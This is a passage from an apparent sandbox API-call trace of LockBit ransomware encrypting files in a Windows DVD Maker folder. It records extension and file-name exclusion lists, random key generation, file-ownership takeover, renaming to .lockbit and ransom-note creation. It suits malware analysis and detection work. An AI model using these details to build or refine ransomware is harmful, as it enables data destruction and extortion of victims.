maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.271] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.271] malloc (_Size=0x40068) returned 0x3d70048 [0091.271] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2925684) returned 1 [0091.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.275] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.308] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.308] malloc (_Size=0xc2) returned 0x1ff1e60 [0091.308] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0091.336] free (_Block=0x1ff1e60) [0091.336] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.336] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.336] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.336] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71789208, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71789208, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x524e6293, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e59f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0091.336] lstrcmpiW (lpString1=".", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.336] lstrcmpiW (lpString1="..", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.336] PathFindExtensionW (pszPath="SportsScenesBackground_PAL.wmv") returned=".wmv" [0091.336] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.336] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.337] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.337] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] lstrcmpiW (lpString1="ntldr", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsScenesBackground_PAL.wmv") returned 1 [0091.338] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsScenesBackground_PAL.wmv") returned -1 [0091.338] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.338] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned=".wmv" [0091.338] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.338] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.338] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.339] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.339] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.lockbit") returned 90 [0091.339] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.341] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.342] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.342] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.343] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.345] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.345] RtlFreeAnsiString (AnsiString="\\") [0091.345] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.346] malloc (_Size=0x200) returned 0x2071008 [0091.346] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.346] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.346] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.346] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.347] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.347] CloseHandle (hObject=0x4b4) returned 1 [0091.347] free (_Block=0x2071008) [0091.347] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.347] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.347] malloc (_Size=0x40068) returned 0x3d70048 [0091.347] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3037684) returned 1 [0091.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.353] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.363] malloc (_Size=0xca) returned 0x1ff1e60 [0091.364] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0091.396] free (_Block=0x1ff1e60) [0091.396] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.396] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.396] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.396] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 1 [0091.396] lstrcmpiW (lpString1=".", lpString2="sports_disc_mask.png") returned -1 [0091.396] lstrcmpiW (lpString1="..", lpString2="sports_disc_mask.png") returned -1 [0091.396] PathFindExtensionW (pszPath="sports_disc_mask.png") returned=".png" [0091.396] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0091.396] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0091.396] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0091.396] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0091.396] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0091.396] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0091.397] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0091.397] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0091.398] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="sports_disc_mask.png") returned -1 [0091.398] lstrcmpiW (lpString1="ntldr", lpString2="sports_disc_mask.png") returned -1 [0091.398] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="sports_disc_mask.png") returned -1 [0091.398] lstrcmpiW (lpString1="bootsect.bak", lpString2="sports_disc_mask.png") returned -1 [0091.398] lstrcmpiW (lpString1="autorun.inf", lpString2="sports_disc_mask.png") returned -1 [0091.398] lstrcmpiW (lpString1="thumbs.db", lpString2="sports_disc_mask.png") returned 1 [0091.398] lstrcmpiW (lpString1="iconcache.db", lpString2="sports_disc_mask.png") returned -1 [0091.398] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.398] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png") returned=".png" [0091.398] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0091.398] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0091.399] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0091.399] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0091.400] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.lockbit") returned 80 [0091.400] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.402] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.403] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.403] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.405] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.406] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.406] RtlFreeAnsiString (AnsiString="\\") [0091.406] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.407] malloc (_Size=0x200) returned 0x2071008 [0091.407] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.407] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.407] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.407] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.408] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.408] CloseHandle (hObject=0x4b4) returned 1 [0091.408] free (_Block=0x2071008) [0091.408] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.408] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.409] malloc (_Size=0x40068) returned 0x3d70048 [0091.409] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=9170) returned 1 [0091.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.415] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 